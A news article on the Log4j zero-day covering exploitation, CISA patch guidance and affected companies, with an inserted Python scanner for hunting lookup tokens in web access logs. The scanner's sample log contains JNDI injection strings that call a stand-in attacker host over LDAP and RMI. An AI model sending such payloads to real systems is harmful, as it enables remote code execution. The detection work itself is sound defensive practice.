Log4j zero-day exploit might be the one that haunts internet for years

Hundreds of millions of devices affected by the Log4j flaw

Major zero-day makes headlines: the Log4j exploit results in one of the biggest cyber threats this year.

Log4j is an open-source Java logging framework, part of the Apache Logging Services.[1] It is used at the enterprise level in different applications globally. Big news broke recently: details of serious flaws in the Apache Log4j logging library were shared, and soon enough, exploitation began. Now, days later, things are still escalating. Experts point out that in just one day, more than 60 major variants have spun off.

As exploits of the Apache Log4j logging library mutate rapidly, the majority of the threats are related to cryptocurrency mining done on victims' dime.[2] That, however, is not the end of the problem but just the beginning: threat actors are also seeking to spread more dangerous malware on vulnerable systems. Moreover, it seems that major exploitation has been happening for a whole month and has only now become public.

Right now, the Cybersecurity and Infrastructure Security Agency (CISA) is working closely with partners to fix the issue, and it is hoped that the vulnerability can soon be patched. Meanwhile, the problem remains: threat actors achieve unauthenticated remote code execution by changing the User-Agent header sent by the browser to a crafted string. When the Log4j library parses that string, it forces a callback to the attacker's URL, which can be used to deliver encoded commands to unprotected devices.
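Because the attacker-controlled string travels in ordinary request fields, defenders can hunt for it in web-server access logs. The following is an added example, not part of the original article: it parses combined-format access log lines (constructed sample data, not real traffic) and flags any Log4j-style `${...}` lookup token found in the User-Agent, request line or Referer, which should never appear in legitimate traffic.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample access log (combined log format). The final quoted field
# is the User-Agent, the header the article says attackers replace. Made up.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Dec/2021:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.11 - - [10/Dec/2021:13:55:40 +0000] "GET /login HTTP/1.1" 200 118 "-" "${jndi:ldap://203.0.113.5:1389/a}"
203.0.113.12 - - [10/Dec/2021:13:56:02 +0000] "GET /${jndi:rmi://203.0.113.5/x} HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.13 - - [10/Dec/2021:13:57:10 +0000] "GET /health HTTP/1.1" 200 2 "-" "kube-probe/1.22"
"""

# Combined log format: client, ident, user, [time], "request", status, bytes, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A Log4j lookup has the shape ${name:...}. Any such token inside a
# client-supplied field is anomalous, whatever resolver it names.
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")


@dataclass
class Finding:
    client: str   # source address from the log line
    field: str    # which client-controlled field carried the lookup
    token: str    # the matched lookup text


def scan_line(line: str) -> List[Finding]:
    """Return one Finding per lookup token in the UA, request line or referer."""
    m = LOG_RE.match(line)
    if not m:
        return []  # unparseable line: skip rather than guess
    return [
        Finding(m.group("client"), field, tok)
        for field in ("ua", "request", "referer")
        for tok in LOOKUP_RE.findall(m.group(field))
    ]


def scan_log(text: str) -> List[Finding]:
    """Scan a whole log, ignoring blank lines."""
    return [f for line in text.splitlines() if line.strip() for f in scan_line(line)]


def is_jndi(token: str) -> bool:
    """True when the lookup names the JNDI resolver (case-insensitive)."""
    return "jndi:" in token.lower()
```

Run `scan_log(SAMPLE_LOG)` to get two findings from the constructed data, one in the User-Agent and one in the request line; feeding real access logs in the same format works unchanged.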

Companies rush to protect their own products

These exploits spread incredibly rapidly and could leave systems with major cybersecurity problems. That is why CISA strongly advises anyone who was impacted by these exploits to immediately apply available patches. According to CISA, patching should start with critical systems, then move to internet-facing systems and networked servers. Other possibly affected technologies should be patched as well.

However, it seems that patches are rolling out too slowly and cannot guarantee full protection. With these massive exploits impacting a number of online services, like Twitter, Amazon, or Minecraft, hackers are as invested as ever. Global cybersecurity watchdog CERT reports that the zero-day is being exploited and that hackers are actively seeking out systems not yet upgraded to Apache Log4j version 2.15.0.[3]

Soon after the news about the exploits broke, many companies started to look into their own products and whether they are impacted. According to the media, major global companies like Apple, Amazon, Twitter, Cloudflare, Baidu, NetEase, and Tencent are still facing the aftermath of the zero-day vulnerability. For example, with exploitation of Minecraft still somewhat active, some users have been able to take control of other users' systems.

Cybersecurity should not be forgotten as the issue might be serious in the future

These major cyber threats come as a reminder to stay alert. With the cyber environment becoming more dangerous, companies and users rely on fix-up patches. A security patch is usually an update pushed by a software developer to all devices running the software that needs updating. Often, patches are pushed out after a major security breach or vulnerability is found. Their purpose is to cover the security holes that a major software update or the initial software download did not.[4]

With exploits like the one in the Log4j case, the response should be quick and correct. A zero-day vulnerability has a huge potential to impact millions of customers and companies globally.[5] As it is usually an unknown exploit, it can create complicated problems before anyone realizes something is wrong or what the next step should be. In recent years, zero-day vulnerabilities have become more common.

In 2021, Google's Chrome suffered serious threats that forced Chrome to be updated. Back in 2020, Zoom suffered as well, as hackers managed to access computers and other devices remotely due to vulnerabilities in older versions of Windows. In a similar manner, Apple was hit by a zero-day bug that allowed attackers to compromise iPhones remotely.

About the author
Ugnius Kiguolis

Ugnius Kiguolis is a professional malware analyst who is also the founder and the owner of 2-Spyware. At the moment, he takes over as Editor-in-chief.
